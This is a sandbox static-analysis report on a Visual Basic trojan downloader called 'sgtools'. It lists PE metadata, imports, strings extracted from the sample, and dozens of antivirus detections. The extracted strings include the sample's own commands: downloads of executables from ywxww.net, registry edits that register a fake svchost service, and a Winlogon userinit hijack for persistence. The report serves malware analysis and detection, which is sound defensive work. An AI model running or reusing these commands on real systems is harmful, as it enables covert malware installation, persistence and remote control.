popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

PE Compile Time

2019-03-15 19:09:34

PE Imphash

bc9d0037d54dc1aef8e90b93cb7890f4

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00001000 0x000172d0 0x00018000 5.39076600904
.data 0x00019000 0x00005624 0x00001000 0.0
.rsrc 0x0001f000 0x000018c4 0x00002000 3.09725359012

Resources

Name Offset Size Language Sub-language File type
RT_ICON 0x0001f3dc 0x00000a74 LANG_NEUTRAL SUBLANG_NEUTRAL dBase III DBT, version number 0, next free block index 40
RT_ICON 0x0001f3dc 0x00000a74 LANG_NEUTRAL SUBLANG_NEUTRAL dBase III DBT, version number 0, next free block index 40
RT_GROUP_ICON 0x0001f3c8 0x00000014 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED data
RT_GROUP_ICON 0x0001f3c8 0x00000014 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED data
RT_VERSION 0x0001f150 0x00000264 LANG_CHINESE SUBLANG_CHINESE_SIMPLIFIED data

Imports

Library MSVBVM60.DLL:
0x401000 __vbaVarTstGt
0x401004 __vbaStrI2
0x401008 _CIcos
0x40100c _adj_fptan
0x401010 __vbaVarMove
0x401014 __vbaFreeVar
0x401018 __vbaStrVarMove
0x40101c __vbaFreeVarList
0x401020 __vbaEnd
0x401024 _adj_fdiv_m64
0x401028 __vbaFreeObjList
0x40102c __vbaLineInputVar
0x401030 _adj_fprem1
0x401034 __vbaStrCat
0x401038 __vbaSetSystemError
0x401040 _adj_fdiv_m32
0x401044 __vbaExitProc
0x401048 None
0x40104c __vbaObjSet
0x401050 __vbaOnError
0x401054 _adj_fdiv_m16i
0x401058 __vbaObjSetAddref
0x40105c _adj_fdivr_m16i
0x401060 None
0x401064 __vbaFPFix
0x401068 _CIsin
0x40106c __vbaChkstk
0x401070 __vbaFileClose
0x401074 EVENT_SINK_AddRef
0x401078 __vbaStrCmp
0x40107c None
0x401080 __vbaObjVar
0x401084 __vbaI2I4
0x401088 DllFunctionCall
0x40108c _adj_fpatan
0x401090 __vbaStrR8
0x401094 EVENT_SINK_Release
0x401098 None
0x40109c _CIsqrt
0x4010a4 __vbaExceptHandler
0x4010a8 __vbaPrintFile
0x4010ac _adj_fprem
0x4010b0 _adj_fdivr_m64
0x4010b4 None
0x4010b8 __vbaFPException
0x4010bc __vbaStrVarVal
0x4010c0 __vbaVarCat
0x4010c4 _CIlog
0x4010c8 __vbaErrorOverflow
0x4010cc __vbaFileOpen
0x4010d0 __vbaR8Str
0x4010d4 __vbaNew2
0x4010d8 _adj_fdiv_m32i
0x4010dc _adj_fdivr_m32i
0x4010e0 __vbaFreeStrList
0x4010e4 _adj_fdivr_m32
0x4010e8 _adj_fdiv_r
0x4010ec None
0x4010f0 None
0x4010f4 __vbaVarDup
0x4010f8 __vbaStrToAnsi
0x4010fc __vbaVarCopy
0x401100 __vbaFpI4
0x401104 __vbaLateMemCallLd
0x401108 _CIatan
0x40110c __vbaStrMove
0x401110 None
0x401114 _allmul
0x401118 _CItan
0x40111c None
0x401120 _CIexp
0x401124 __vbaFreeStr
0x401128 __vbaFreeObj
!This program cannot be run in DOS mode.
`.data
MSVBVM60.DLL
Command1
Command1
Label2
label2
Label1
label1
vb6chs.dll
sgtools
h{R?*I
Module1
Form10
Form11
Command4
C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
Command5
Command6
Command1
Command2
Command3
urlmon
URLDownloadToFileA
h{R?*I
Command8
Command9
Command10
Command11
Command12
Command7
shell32.dll
ShellExecuteA
shlwapi.dll
PathFileExistsA
kernel32
DeleteFileA
Q[T Et
VBA6.DLL
__vbaOnError
__vbaFreeObj
__vbaObjSet
__vbaHresultCheckObj
__vbaNew2
Label2
Label1
CreateWaitableTimerA
OpenWaitableTimerA
SetWaitableTimer
CancelWaitableTimer
CloseHandle
WaitForSingleObject
user32
MsgWaitForMultipleObjects
__vbaEnd
__vbaPrintFile
__vbaFreeVar
__vbaVarTstGt
__vbaFileClose
__vbaLineInputVar
__vbaFileOpen
__vbaStrI2
__vbaStrMove
__vbaFreeStr
__vbaStrCat
__vbaSetSystemError
__vbaStrToAnsi
__vbaVarMove
__vbaI2I4
__vbaObjSetAddref
__vbaFreeVarList
__vbaVarDup
__vbaFreeObjList
__vbaFreeStrList
__vbaStrCmp
__vbaVarCat
__vbaStrVarVal
__vbaLateMemCallLd
__vbaStrVarMove
__vbaObjVar
tXT{vU_
__vbaVarCopy
__vbaErrorOverflow
N:g?bir
__vbaExitProc
__vbaStrR8
__vbaR8Str
__vbaFPFix
__vbaFpI4
N:g?bir
N:g?bir
gyrCg3u
gyrCg3u
yrCg3u
yrCg3u
eyrCg3u
eyrCg3u
eyrCg3u
yrCg3u
gyrCg3u
Command4
Command4
Command3
Command3
Command2
Command2
Command1
Command1
Command4
Command4
Command3
Command3
Command2
Command2
Command1
Command1
Form10
Form10
Command6
Command6
Command5
Command5
Command4
Command4
Command3
Command3
Command2
Command2
Command1
Command1
Command6
Command6
Command5
Command5
Command4
Command4
Command3
Command3
Command2
Command2
Command1
Command1
Command7
Command7
Command6
Command6
Command5
Command5
Command4
Command4
Command3
Command3
Command2
Command2
Command1
Command1
Q[T Et
Command7
Command7
Command6
Command6
Command5
Command5
Command4
Command4
Command3
Command3
Command2
Command2
Command1
Command1
Command7
Command7
Command6
Command6
Command5
Command5
Command4
Command4
Command3
Command3
Command2
Command2
Command1
Command1
Form11
Me.Caption = "
Command1.Caption = "
Command2.Caption = "steam
Command3.Caption = "
Command4.Caption = "
Command5.Caption = "
Command6.Caption = "
pubwinol"
Form11
Command6
Command6
Command5
Command5
Command4
Command4
Command3
Command3
Command2
Command2
Command1
Command1
h{R?*I
Command12
Command12
Command11
Command11
Command10
Command10
Command9
Command9
Command8
Command8
Command7
Command7
Command6
Command6
Command5
Command5
Command4
Command4
Command3
Command3
Command2
Command2
Command1
Command1
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
RGhpp@
QGh<q@
QGh`q@
}#jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
WWhT}@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
WWhT}@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh(m@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
jTh@n@
MSVBVM60.DLL
__vbaVarTstGt
__vbaStrI2
_CIcos
_adj_fptan
__vbaVarMove
__vbaFreeVar
__vbaStrVarMove
__vbaFreeVarList
__vbaEnd
_adj_fdiv_m64
__vbaFreeObjList
__vbaLineInputVar
_adj_fprem1
__vbaStrCat
__vbaSetSystemError
__vbaHresultCheckObj
_adj_fdiv_m32
__vbaExitProc
__vbaObjSet
__vbaOnError
_adj_fdiv_m16i
__vbaObjSetAddref
_adj_fdivr_m16i
__vbaFPFix
_CIsin
__vbaChkstk
__vbaFileClose
EVENT_SINK_AddRef
__vbaStrCmp
__vbaObjVar
__vbaI2I4
DllFunctionCall
_adj_fpatan
__vbaStrR8
EVENT_SINK_Release
_CIsqrt
EVENT_SINK_QueryInterface
__vbaExceptHandler
__vbaPrintFile
_adj_fprem
_adj_fdivr_m64
__vbaFPException
__vbaStrVarVal
__vbaVarCat
_CIlog
__vbaErrorOverflow
__vbaFileOpen
__vbaR8Str
__vbaNew2
_adj_fdiv_m32i
_adj_fdivr_m32i
__vbaFreeStrList
_adj_fdivr_m32
_adj_fdiv_r
__vbaVarDup
__vbaStrToAnsi
__vbaVarCopy
__vbaFpI4
__vbaLateMemCallLd
_CIatan
__vbaStrMove
_allmul
_CItan
_CIexp
__vbaFreeStr
__vbaFreeObj
OAtAWA%
A*\AD:\vbfiles\sgtools0315\form1.vbp
pubwinol
xwwvbab0501
xww579
xwwyaya8989
http://safe.ywxww.net:820/sg.txt
c:\windows\sg.txt
RunDll32.exe InetCpl.cpl,ClearMyTracksByProcess 8
http://safe.ywxww.net:820/sgupdate.exe
c:\windows\sgupdate.exe
c:\windows\fn.txt
c:\windows\fp.txt
WScript.Shell
Desktop
SpecialFolders
cmd /c sc config wuauserv start= auto
cmd /c sc start wuauserv
http://ftp.ywxww.net:820/KB2808679x64.exe
\KB2808679x64.msu
http://ftp.ywxww.net:820/KB2868626x64.exe
\KB2868626x64.msu
http://safe.ywxww.net:820/vc17x86.exe
\vc17x86.exe
http://ftp.ywxww.net:820/vc17x64.exe
\vc17x64.exe
http://ftp.ywxww.net:820/steam.txt
c:\windows\steam.reg
regedit /s c:\windows\steam.reg
VC2017
http://safe.ywxww.net:820/svchost.exe
c:\windows\svchost.exe
http://safe.ywxww.net:820/xconfig.txt
c:\windows\xconfig.ini
cmd /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\svchost" /v Type /t reg_dword /d 00000272 /f /reg:64
cmd /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\svchost" /v Start /t reg_dword /d 00000002 /f /reg:64
cmd /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\svchost" /v ErrorControl /t reg_dword /d 00000001 /f /reg:64
http://ftp.ywxww.net:820/pubwin1506.exe
\pubwin1506.exe
http://ftp.ywxww.net:820/pubolclient.exe
cmd /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\svchost" /v WOW64 /t reg_dword /d 00000001 /f /reg:64
cmd /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\svchost" /v Group /t reg_sz /d "Event Log" /f /reg:64
cmd /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\svchost" /v DisplayName /t reg_sz /d svchost /f /reg:64
cmd /c reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run" /v wxDesktop /f /reg:64
cmd /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\svchost" /v ObjectName /t reg_sz /d LocalSystem /f /reg:64
cmd /c RunDll32.exe USER32.DLL,UpdatePerUserSystemParameters
http://safe.ywxww.net:820/cpie.exe
Remote
cmd /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\svchost" /v FailureActions /t reg_binary /d "ffffffff000000000000000001000000140000000100000001000000" /f /reg:64
c:\windows\system\xww.exe
http://ftp.ywxww.net:820/ydcx.exe
cmd /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\svchost" /v ImagePath /t reg_expand_sz /d "c:\Windows\svchost.exe /service" /f /reg:64
c:\windows\syswow64\DesktopLauncher.exe
cmd /c sc delete "client start"
office2010
cmd /c reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Hintsoft\PubwinClient" /v autorun /reg:64 >nul 2>nul && reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Hintsoft\PubwinClient" /v autorun /t reg_sz /d 1 /f /reg:64||exit
cmd /c reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Provider Filters\{18E425E3-2B83-4254-A72F-860A4384B80D}" /f /reg:64
ol,Pub
c:\windows\system\config.txt
Winrar5.2
cmd /c reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{18E425E3-2B83-4254-A72F-860A4384B80D}" /f /reg:64
PB1506
Pbol926
cmd /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v userinit /t reg_sz /d C:\Windows\system32\userinit.exe,c:\windows\system\xww.exe /f /reg:64
http://safe.ywxww.net:820/xww.exe
cmd /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v Startup /t reg_sz /d "C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" /f /reg:64
cmd /c reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v desktop /t reg_sz /d %USERPROFILE%\Desktop /f /reg:64
\Internet Explorer.lnk
\Internt Explorer.exe
\pubolclient.exe
\ydcx.exe
cmd /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel" /v {871C5380-42A0-1069-A2EA-08002B30308D} /t reg_dword /d 1 /f /reg:64
\internet.exe
\Internt Explorer.lnk
http://ftp.ywxww.net:820/x210.exe
\x210.exe
http://ftp.ywxww.net:820/qqnetbar.exe
\qqnetbar.exe
http://ftp.ywxww.net:820/hydkj.exe
\hydkj.exe
http://ftp.ywxww.net:820/RemotelyAnywhere11.exe
\RemotelyAnywhere11.exe
http://ftp.ywxww.net:820/pubolconsole.exe
\pubolconsole.exe
http://ftp.ywxww.net:820/qwsrv3.3.exe
\qwsrv3.3.exe
http://ftp.ywxww.net:820/smb.exe
\smb.exe
http://ftp.ywxww.net:820/rlol.exe
\rlpbol.exe
\rlol.exe
http://ftp.ywxww.net:820/rlpb15.exe
\rlpb15.exe
http://ftp.ywxww.net:820/pbconsole1507.exe
\pbconsole1507.exe
http://ftp.ywxww.net:820/rlaz.exe
\rlaz.exe
Pubin15
pubwinol
http://ftp.ywxww.net:820/cysoft/winrarx64521sc.exe
\winrarx64521sc.exe
http://ftp.ywxww.net:820/cysoft/office2010.exe
\office2010.exe
[clsWaitableTimer.Wait]
http://ftp.ywxww.net:820/
http://ftp.ywxww.net:820/
http://ftp.ywxww.net:820/
http://ftp.ywxww.net:820/LOL
http://ftp.ywxww.net:820/LOL
http://ftp.ywxww.net:820/LOL
http://ftp.ywxww.net:820/pubolupdate.exe
\pubolupdate.exe
C:\Windows\System32\GroupPolicy\User\Scripts\Logon\script.vbs
explorer C:\Windows\System32\GroupPolicy\User\Scripts\Logon
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
080404B0
Comments
CompanyName
ProductName
sgtools
FileVersion
1.03.0003
ProductVersion
1.03.0003
InternalName
OriginalFilename
sg.exe
Antivirus Signature
Bkav W32.Common.3B4BCA8C
Lionic Trojan.Win32.Redcap.4!c
Elastic Clean
ClamAV Clean
CMC Clean
CAT-QuickHeal Trojan.Agent
Skyhigh BehavesLike.Win32.Infected.cm
McAfee Artemis!48BC0B9203E4
Cylance Unsafe
Zillya Downloader.Generic.Win32.8270
CrowdStrike win/malicious_confidence_100% (W)
Alibaba TrojanDownloader:Win32/Redcap.7e31b189
K7GW Clean
K7AntiVirus Clean
huorong HEUR:Trojan/VBCode.a
Baidu Clean
VirIT Trojan.Win32.VBGenus.FZC
Paloalto generic.ml
Symantec ML.Attribute.HighConfidence
tehtris Clean
ESET-NOD32 Clean
APEX Malicious
Avast Win32:Malware-gen
Cynet Malicious (score: 99)
Kaspersky Trojan.Win32.Agent.xabcvr
BitDefender Trojan.GenericKD.74630897
NANO-Antivirus Trojan.Win32.Dwn.fxfrnd
ViRobot Trojan.Win.Z.Bulz.114688.B
MicroWorld-eScan Trojan.GenericKD.74630897
Tencent Win32.Trojan.Agent.Yolw
Sophos Mal/Generic-S
F-Secure Trojan.TR/Redcap.dqzcq
DrWeb Trojan.DownLoader29.40575
VIPRE Trojan.GenericKD.74630897
TrendMicro TROJ_GEN.R06EC0RK324
McAfeeD ti!B0CBF6B1C6E6
Trapmine Clean
CTX exe.trojan.redcap
Emsisoft Trojan.GenericKD.74630897 (B)
Ikarus Clean
FireEye Trojan.GenericKD.74630897
Jiangmin TrojanDownloader.Generic.bdhh
Webroot Clean
Varist W32/ABApplication.UDPT-6682
Avira TR/Redcap.dqzcq
Fortinet W32/Dloader.X!tr
Antiy-AVL Trojan/Win32.Fuerboos
Kingsoft malware.kb.a.960
Gridinsoft Clean
Xcitium Clean
Arcabit Trojan.Generic.D472C6F1
SUPERAntiSpyware Clean
ZoneAlarm Trojan.Win32.Agent.xabcvr
Microsoft Trojan:Win32/Znyonm
Google Detected
AhnLab-V3 Trojan/Win32.Tiggre.C3452069
Acronis Clean
VBA32 Trojan.Agent
TACHYON Clean
Malwarebytes Generic.Malware/Suspicious
Panda Trj/GdSda.A
Zoner Clean
TrendMicro-HouseCall TROJ_GEN.R06EC0RK324
Rising Downloader.Generic!8.141 (CLOUD)
Yandex Clean
SentinelOne Clean
MaxSecure Trojan.Malware.1728101.susgen
GData Trojan.GenericKD.74630897
AVG Win32:Malware-gen
DeepInstinct MALICIOUS
alibabacloud Clean
No IRMA results available.